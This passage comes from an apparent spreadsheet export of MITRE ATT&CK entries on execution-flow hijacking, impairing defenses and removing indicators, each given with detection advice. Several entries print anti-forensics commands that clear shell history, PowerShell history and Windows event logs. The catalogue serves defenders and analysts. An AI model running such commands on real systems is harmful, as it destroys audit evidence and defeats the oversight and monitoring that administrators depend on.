    <t>https://attack.mitre.org/techniques/T1574/006</t>
  </si>
  <si>
    <t>Monitor for changes to environment variables and files associated with loading shared libraries such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; and &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;, as well as the commands to implement these changes.
Monitor processes for unusual activity (e.g., a process that does not use the network begins to do so). Track library metadata, such as a hash, and compare libraries that are loaded at process execution time against previous executions to detect differences that do not correlate with patching or updates.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation</t>
  </si>
  <si>
    <t>T1574.005</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Executable Installer File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by an installer. These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Another variation of this technique can be performed by taking advantage of a weakness that is common in executable, self-extracting installers. During the installation process, it is common for installers to use a subdirectory within the &lt;code&gt;%TEMP%&lt;/code&gt; directory to unpack binaries such as DLLs, EXEs, or other payloads. When installers create subdirectories and files they often do not set appropriate permissions to restrict write access, which allows for execution of untrusted code placed in the subdirectories or overwriting of binaries used in the installation process. This behavior is related to and may take advantage of [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. Some installers may also require elevated privileges that will result in privilege escalation when executing adversary controlled code. This behavior is related to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this weakness in existing common installers have been reported to software vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are Vulnerable) If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/005</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.007</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by PATH Environment Variable</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking environment variables used to load libraries. Adversaries may place a program in an earlier entry in the list of directories stored in the PATH environment variable, which Windows will then execute when it searches sequentially through that PATH listing in search of the binary that was called from a script or the command line.
The PATH environment variable contains a list of directories. Certain methods of executing a program (namely using cmd.exe or the command-line) rely solely on the PATH environment variable to determine the locations that are searched for a program when the path for the program is not given. If any directories are listed in the PATH environment variable before the Windows directory, &lt;code&gt;%SystemRoot%\system32&lt;/code&gt; (e.g., &lt;code&gt;C:\Windows\system32&lt;/code&gt;), a program may be placed in the preceding directory that is named the same as a Windows program (such as cmd, PowerShell, or Python), which will be executed when that command is executed from a script or command-line.
For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;/code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system "net" when "net" is executed from the command-line.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/007</t>
  </si>
  <si>
    <t>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t>
  </si>
  <si>
    <t>Stefan Kanthak</t>
  </si>
  <si>
    <t>T1574.008</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Search Order Hijacking</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the search order used to load other programs. Because some programs do not call other programs using the full path, adversaries may place their own file in the directory where the calling program is located, causing the operating system to launch their malicious software at the request of the calling program.
Search order hijacking occurs when an adversary abuses the order in which Windows searches for programs that are not given a path. Unlike [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs depending on the method that is used to execute the program. (Citation: Microsoft CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) However, it is common for Windows to search in the directory of the initiating program before searching through the Windows system directory. An adversary who finds a program vulnerable to search order hijacking (i.e., a program that does not specify the path to an executable) may take advantage of this vulnerability by creating a program named after the improperly specified program and placing it within the initiating program's directory.
For example, "example.exe" runs "cmd.exe" with the command-line argument &lt;code&gt;net user&lt;/code&gt;. An adversary may place a program called "net.exe" within the same directory as example.exe, "net.exe" will be run instead of the Windows system utility net. In addition, if an adversary places a program called "net.com" in the same directory as "net.exe", then &lt;code&gt;cmd.exe /C net user&lt;/code&gt; will execute "net.com" instead of "net.exe" due to the order of executable extensions defined under PATHEXT. (Citation: Microsoft Environment Property)
Search order hijacking is also a common practice for hijacking DLL loads and is covered in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/008</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor file creation for files named after partial directories and in locations that may be searched for common processes through the environment variable, or otherwise should not be user writable. Monitor the executing process for process executable paths that are named for partial directories. Monitor file creation for programs that are named after Windows system programs or programs commonly executed without a path (such as "findstr," "net," and "python"). If this activity occurs outside of known administration activity, upgrades, installations, or patches, then it may be suspicious.
Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
</t>
  </si>
  <si>
    <t>T1574.009</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Path Interception by Unquoted Path</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking vulnerable file path references. Adversaries can take advantage of paths that lack surrounding quotations by placing an executable in a higher level directory within the path, so that Windows will choose the adversary's executable to launch.
Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may also be vulnerable to path interception if the path has one or more spaces and is not surrounded by quotation marks (e.g., &lt;code&gt;C:\unsafe path with space\program.exe&lt;/code&gt; vs. &lt;code&gt;"C:\safe path with space\program.exe"&lt;/code&gt;). (Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary can place an executable in a higher level directory of the path, and Windows will resolve that executable instead of the intended executable. For example, if the path in a shortcut is &lt;code&gt;C:\program files\myapp.exe&lt;/code&gt;, an adversary may create a program at &lt;code&gt;C:\program.exe&lt;/code&gt; that will be run instead of the intended program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation Guide)
This technique can be used for persistence if executables are called on a regular basis, as well as privilege escalation if intercepted executables are started by a higher privileged process.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/009</t>
  </si>
  <si>
    <t>T1574.010</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services File Permissions Weakness</t>
  </si>
  <si>
    <t>Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.
Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/010</t>
  </si>
  <si>
    <t xml:space="preserve">Look for changes to binaries and service executables that may normally occur during software updates. If an executable is written, renamed, and/or moved to match an existing service executable, it could be detected and correlated with other suspicious behavior. Hashing of binaries and service executables could be used to detect replacement against historical data.
Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques. </t>
  </si>
  <si>
    <t>File: File Creation, File: File Modification, Process: Process Creation, Service: Service Metadata</t>
  </si>
  <si>
    <t>T1574.011</t>
  </si>
  <si>
    <t>Hijack Execution Flow: Services Registry Permissions Weakness</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may execute their own malicious payloads by hijacking the Registry entries used by services. Adversaries may use flaws in the permissions for registry to redirect from the originally specified executable to one that they control, in order to launch their own code at Service start.  Windows stores local service configuration information in the Registry under &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Services&lt;/code&gt;. The information stored under a service's Registry keys can be manipulated to modify a service's execution parameters through tools such as the service controller, sc.exe,  [PowerShell](https://attack.mitre.org/techniques/T1059/001), or [Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled through Access Control Lists and permissions. (Citation: Registry Key Security)
If the permissions for users and groups are not properly set and allow access to the Registry keys for a service, then adversaries can change the service binPath/ImagePath to point to a different executable under their control. When the service starts or is restarted, then the adversary-controlled program will execute, allowing the adversary to gain persistence and/or privilege escalation to the account context the service is set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).
Adversaries may also alter Registry keys associated with service failure parameters (such as &lt;code&gt;FailureCommand&lt;/code&gt;) that may be executed in an elevated context anytime the service fails or is intentionally corrupted.(Citation: Kansa Service related collectors)(Citation: Tweet Registry Perms Weakness) </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1574/011</t>
  </si>
  <si>
    <t>Service changes are reflected in the Registry. Modification to existing services should not occur frequently. If a service binary path or failure parameters are changed to values that are not typical for that service and does not correlate with software updates, then it may be due to malicious activity. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.
Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current service information. (Citation: Autoruns for Windows) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.
Monitor processes and command-line arguments for actions that could be done to modify services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be changed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</si>
  <si>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Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Matthew Demaske, Adaptforward; Travis Smith, Tripwire</t>
  </si>
  <si>
    <t>T1562</t>
  </si>
  <si>
    <t>Impair Defenses</t>
  </si>
  <si>
    <t>Adversaries may maliciously modify components of a victim environment in order to hinder or disable defensive mechanisms. This not only involves impairing preventative defenses, such as firewalls and anti-virus, but also detection capabilities that defenders can use to audit activity and identify malicious behavior. This may also span both native defenses as well as supplemental capabilities installed by users and administrators.
Adversaries could also target event aggregation and analysis mechanisms, or otherwise disrupt these procedures by altering other system components.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools or logging services are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools.  Lack of log events may be suspicious.
Monitor environment variables and APIs that can be leveraged to disable security measures.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Office 365, Windows, macOS</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification, Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Process: Process Termination, Script: Script Execution, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Anti-virus, Digital Certificate Validation, File monitoring, Firewall, Host forensic analysis, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1562.008</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Cloud Logs</t>
  </si>
  <si>
    <t>An adversary may disable cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. 
Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an attacker has sufficient permissions, they can disable logging to avoid detection of their activities. For example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity.(Citation: Following the CloudTrail: Generating strong AWS security signals with Sumo Logic)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/008</t>
  </si>
  <si>
    <t>12 October 2020</t>
  </si>
  <si>
    <t>Monitor logs for API calls to disable logging. In AWS, monitor for: &lt;code&gt;StopLogging&lt;/code&gt; and &lt;code&gt;DeleteTrail&lt;/code&gt;.(Citation: Stopping CloudTrail from Sending Events to CloudWatch Logs) In GCP, monitor for: &lt;code&gt;google.logging.v2.ConfigServiceV2.UpdateSink&lt;/code&gt;.(Citation: Configuring Data Access audit logs)  In Azure, monitor for &lt;code&gt;az monitor diagnostic-settings delete&lt;/code&gt;.(Citation: az monitor diagnostic-settings) Additionally, a sudden loss of a log source may indicate that it has been disabled.</t>
  </si>
  <si>
    <t>Cloud Service: Cloud Service Disable, Cloud Service: Cloud Service Modification</t>
  </si>
  <si>
    <t>Alex Soler, AttackIQ; Ibrahim Ali Khan; Janantha Marasinghe; Matt Snyder, VMware; Prasad Somasamudram, McAfee; Sekhar Sarukkai, McAfee ; Syed Ummar Farooqh, McAfee</t>
  </si>
  <si>
    <t>T1562.002</t>
  </si>
  <si>
    <t>Impair Defenses: Disable Windows Event Logging</t>
  </si>
  <si>
    <t>Adversaries may disable Windows event logging to limit data that can be leveraged for detections and audits. Windows event logs record user and system activity such as login attempts, process creation, and much more.(Citation: Windows Log Events) This data is used by security tools and analysts to generate detections.
Adversaries may targeting system-wide logging or just that of a particular application. By disabling Windows event logging, adversaries can operate while leaving less evidence of a compromise behind.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/002</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments for commands that can be used to disable logging. Lack of event logs may be suspicious.</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status</t>
  </si>
  <si>
    <t>Log analysis</t>
  </si>
  <si>
    <t>T1562.007</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Cloud Firewall</t>
  </si>
  <si>
    <t>Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources. Cloud firewalls are separate from system firewalls that are described in [Disable or Modify System Firewall](https://attack.mitre.org/techniques/T1562/004). 
Cloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary may introduce new firewall rules or policies to allow access into a victim cloud environment. For example, an adversary may use a script or utility that creates new ingress rules in existing security groups to allow any TCP/IP connectivity.(Citation: Expel IO Evil in AWS)
Modifying or disabling a cloud firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/007</t>
  </si>
  <si>
    <t>Monitor cloud logs for modification or creation of new security groups or firewall rules.</t>
  </si>
  <si>
    <t>Firewall: Firewall Disable, Firewall: Firewall Rule Modification</t>
  </si>
  <si>
    <t>Expel</t>
  </si>
  <si>
    <t>T1562.004</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify System Firewall</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
Modifying or disabling a system firewall may enable adversary C2 communications, lateral movement, and/or data exfiltration that would otherwise not be allowed. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/004</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if firewalls are disabled or modified. Monitor Registry edits to keys that manage firewalls.</t>
  </si>
  <si>
    <t>Command: Command Execution, Firewall: Firewall Disable, Firewall: Firewall Rule Modification, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Firewall</t>
  </si>
  <si>
    <t>T1562.001</t>
  </si>
  <si>
    <t>Impair Defenses: Disable or Modify Tools</t>
  </si>
  <si>
    <t>Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/001</t>
  </si>
  <si>
    <t>Monitor processes and command-line arguments to see if security tools are killed or stop running. Monitor Registry edits for modifications to services and startup programs that correspond to security tools. Lack of log events may be suspicious.</t>
  </si>
  <si>
    <t>Containers, IaaS, Linux, Windows, macOS</t>
  </si>
  <si>
    <t>Command: Command Execution, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Gal Singer, @galsinger29, Team Nautilus Aqua Security; Nathaniel Quist, Palo Alto Networks; Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security</t>
  </si>
  <si>
    <t>Anti-virus, File monitoring, Host intrusion prevention systems, Log analysis, Signature-based detection</t>
  </si>
  <si>
    <t>T1562.003</t>
  </si>
  <si>
    <t>Impair Defenses: Impair Command History Logging</t>
  </si>
  <si>
    <t>Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done. 
On Linux and macOS, command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The &lt;code&gt;HISTCONTROL&lt;/code&gt; environment variable keeps track of what should be saved by the &lt;code&gt;history&lt;/code&gt; command and eventually into the &lt;code&gt;~/.bash_history&lt;/code&gt; file when a user logs out. &lt;code&gt;HISTCONTROL&lt;/code&gt; does not exist by default on macOS, but can be set by the user and will be respected.
Adversaries may clear the history environment variable (&lt;code&gt;unset HISTFILE&lt;/code&gt;) or set the command history size to zero (&lt;code&gt;export HISTFILESIZE=0&lt;/code&gt;) to prevent logging of commands. Additionally, &lt;code&gt;HISTCONTROL&lt;/code&gt; can be configured to ignore commands that start with a space by simply setting it to "ignorespace". &lt;code&gt;HISTCONTROL&lt;/code&gt; can also be set to ignore duplicate commands by setting it to "ignoredups". In some Linux systems, this is set by default to "ignoreboth" which covers both of the previous examples. This means that “ ls” will not be saved, but “ls” would be saved by history. Adversaries can abuse this to operate without leaving traces by simply prepending a space to all of their terminal commands.
On Windows systems, the &lt;code&gt;PSReadLine&lt;/code&gt; module tracks commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). Adversaries may change where these logs are saved using &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. This will cause &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; to stop receiving logs. Additionally, it is possible to turn off logging to this file using the PowerShell command &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt;.(Citation: Microsoft PowerShell Command History)(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/003</t>
  </si>
  <si>
    <t xml:space="preserve">Correlating a user session with a distinct lack of new commands in their &lt;code&gt;.bash_history&lt;/code&gt; can be a clue to suspicious behavior. Additionally, users checking or changing their &lt;code&gt;HISTCONTROL&lt;/code&gt;, &lt;code&gt;HISTFILE&lt;/code&gt;, or &lt;code&gt;HISTFILESIZE&lt;/code&gt; environment variables may be suspicious.
Monitor for modification of PowerShell command history settings through processes being created with &lt;code&gt;-HistorySaveStyle SaveNothing&lt;/code&gt; command-line arguments and use of the PowerShell commands &lt;code&gt;Set-PSReadlineOption -HistorySaveStyle SaveNothing&lt;/code&gt; and &lt;code&gt;Set-PSReadLineOption -HistorySavePath {File Path}&lt;/code&gt;. </t>
  </si>
  <si>
    <t>Emile Kenning, Sophos; Vikas Singh, Sophos</t>
  </si>
  <si>
    <t>Host forensic analysis, Log analysis</t>
  </si>
  <si>
    <t>T1562.006</t>
  </si>
  <si>
    <t>Impair Defenses: Indicator Blocking</t>
  </si>
  <si>
    <t xml:space="preserve">An adversary may attempt to block indicators or events typically captured by sensors from being gathered and analyzed. This could include maliciously redirecting (Citation: Microsoft Lamin Sept 2017) or even disabling host-based sensors, such as Event Tracing for Windows (ETW),(Citation: Microsoft About Event Tracing 2018) by tampering settings that control the collection and flow of event telemetry. (Citation: Medium Event Tracing Tampering 2018) These settings may be stored on the system in configuration files and/or in the Registry as well as being accessible via administrative utilities such as [PowerShell](https://attack.mitre.org/techniques/T1059/001) or [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047).
ETW interruption can be achieved multiple ways, however most directly by defining conditions using the [PowerShell](https://attack.mitre.org/techniques/T1059/001) &lt;code&gt;Set-EtwTraceProvider&lt;/code&gt; cmdlet or by interfacing directly with the Registry to make alterations.
In the case of network-based reporting of indicators, an adversary may block traffic associated with reporting to prevent central analysis. This may be accomplished by many means, such as stopping a local process responsible for forwarding telemetry and/or creating a host-based firewall rule to block traffic to specific hosts responsible for aggregating events, such as security information and event management (SIEM) products. </t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1562/006</t>
  </si>
  <si>
    <t>13 January 2021</t>
  </si>
  <si>
    <t>Detect lack of reported activity from a host sensor. Different methods of blocking may cause different disruptions in reporting. Systems may suddenly stop reporting all data or only certain kinds of data.
Depending on the types of host information collected, an analyst may be able to detect the event that triggered a process to stop or connection to be blocked. For example, Sysmon will log when its configuration state has changed (Event ID 16) and Windows Management Instrumentation (WMI) may be used to subscribe ETW providers that log any provider removal from a specific trace session. (Citation: Medium Event Tracing Tampering 2018) To detect changes in ETW you can also monitor the registry key which contains configurations for all ETW event providers: &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\WMI\Autologger\AUTOLOGGER_NAME\{PROVIDER_GUID}&lt;/code&gt;</t>
  </si>
  <si>
    <t>Command: Command Execution, Sensor Health: Host Status, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Rob Smith</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems</t>
  </si>
  <si>
    <t>T1525</t>
  </si>
  <si>
    <t>Implant Internal Image</t>
  </si>
  <si>
    <t>Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim’s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)
A tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an attacker has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1525</t>
  </si>
  <si>
    <t>04 September 2019</t>
  </si>
  <si>
    <t xml:space="preserve">Monitor interactions with images and containers by users to identify ones that are added or modified anomalously.
In containerized environments, changes may be detectable by monitoring the Docker daemon logs or setting up and monitoring Kubernetes audit logs depending on registry configuration. </t>
  </si>
  <si>
    <t>Containers, IaaS</t>
  </si>
  <si>
    <t>Image: Image Creation, Image: Image Modification</t>
  </si>
  <si>
    <t>Praetorian; Vishwas Manral, McAfee; Yossi Weizman, Azure Defender Research Team</t>
  </si>
  <si>
    <t>T1070</t>
  </si>
  <si>
    <t>Indicator Removal on Host</t>
  </si>
  <si>
    <t>Adversaries may delete or alter generated artifacts on a host system, including logs or captured files such as quarantined malware. Locations and format of logs are platform or product-specific, however standard operating system logs are captured as Windows events or Linux/macOS files such as [Bash History](https://attack.mitre.org/techniques/T1552/003) and /var/log/*.
These actions may interfere with event collection, reporting, or other notifications used to detect intrusion activity. This that may compromise the integrity of security solutions by causing notable events to go unreported. This activity may also impede forensic analysis and incident response, due to lack of sufficient data to determine what occurred.</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files.  Events not stored on the file system may require different detection mechanisms.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Process: OS API Execution, Process: Process Creation, User Account: User Account Authentication, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification</t>
  </si>
  <si>
    <t>Brad Geesaman, @bradgeesaman; Ed Williams, Trustwave, SpiderLabs</t>
  </si>
  <si>
    <t>Anti-virus, Host intrusion prevention systems, Log analysis</t>
  </si>
  <si>
    <t>T1070.003</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Command History</t>
  </si>
  <si>
    <t>In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable &lt;code&gt;HISTFILE&lt;/code&gt;. When a user logs off a system, this information is flushed to a file in the user's home directory called &lt;code&gt;~/.bash_history&lt;/code&gt;. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (&lt;code&gt;history -c&lt;/code&gt;) or deleting the bash history file &lt;code&gt;rm ~/.bash_history&lt;/code&gt;.
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the &lt;code&gt;PSReadLine&lt;/code&gt; module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The &lt;code&gt;PSReadLine&lt;/code&gt; command history tracks the commands used in all PowerShell sessions and writes them to a file (&lt;code&gt;$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt&lt;/code&gt; by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command &lt;code&gt;Clear-History&lt;/code&gt; to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file. Adversaries may also delete the &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/003</t>
  </si>
  <si>
    <t>31 January 2020</t>
  </si>
  <si>
    <t>User authentication, especially via remote terminal services like SSH, without new entries in that user's &lt;code&gt;~/.bash_history&lt;/code&gt; is suspicious. Additionally, the removal/clearing of the &lt;code&gt;~/.bash_history&lt;/code&gt; file can be an indicator of suspicious activity.
Monitor for suspicious modifications or deletion of &lt;code&gt;ConsoleHost_history.txt&lt;/code&gt; and use of the &lt;code&gt;Clear-History&lt;/code&gt; command.</t>
  </si>
  <si>
    <t>Command: Command Execution, File: File Deletion, File: File Modification</t>
  </si>
  <si>
    <t>T1070.002</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Linux or Mac System Logs</t>
  </si>
  <si>
    <t xml:space="preserve">Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the &lt;code&gt;/var/log/&lt;/code&gt; directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)
* &lt;code&gt;/var/log/messages:&lt;/code&gt;: General and system-related messages
* &lt;code&gt;/var/log/secure&lt;/code&gt; or &lt;code&gt;/var/log/auth.log&lt;/code&gt;: Authentication logs
* &lt;code&gt;/var/log/utmp&lt;/code&gt; or &lt;code&gt;/var/log/wtmp&lt;/code&gt;: Login records
* &lt;code&gt;/var/log/kern.log&lt;/code&gt;: Kernel logs
* &lt;code&gt;/var/log/cron.log&lt;/code&gt;: Crond logs
* &lt;code&gt;/var/log/maillog&lt;/code&gt;: Mail server logs
* &lt;code&gt;/var/log/httpd/&lt;/code&gt;: Web server access and error logs
</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/002</t>
  </si>
  <si>
    <t>File system monitoring may be used to detect improper deletion or modification of indicator files. Also monitor for suspicious processes interacting with log files.</t>
  </si>
  <si>
    <t>T1070.001</t>
  </si>
  <si>
    <t>Indicator Removal on Host: Clear Windows Event Logs</t>
  </si>
  <si>
    <t>Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.
The event logs can be cleared with the following utility commands:
* &lt;code&gt;wevtutil cl system&lt;/code&gt;
* &lt;code&gt;wevtutil cl application&lt;/code&gt;
* &lt;code&gt;wevtutil cl security&lt;/code&gt;
These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001).</t>
  </si>
  <si>
    <t>https://attack.mitre.org/techniques/T1070/001</t>
  </si>
  <si>
    <t>Deleting Windows event logs (via native binaries (Citation: Microsoft wevtutil Oct 2017), API functions (Citation: Microsoft EventLog.Clear), or [PowerShell](https://attack.mitre.org/techniques/T1059/001) (Citation: Microsoft Clear-EventLog)) may also generate an alterable event (Event ID 1102: "The audit log was cleared").</t>
  </si>
  <si>
    <t>Anti Virus, Host Intrusion Prevention Systems, Log Analysis</t>
  </si>
  <si>
    <t>T1070.004</t>
  </si>
  <si>
    <t>Indicator Removal on Host: File Deletion</t>
  </si>
  <si>
    <t>Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
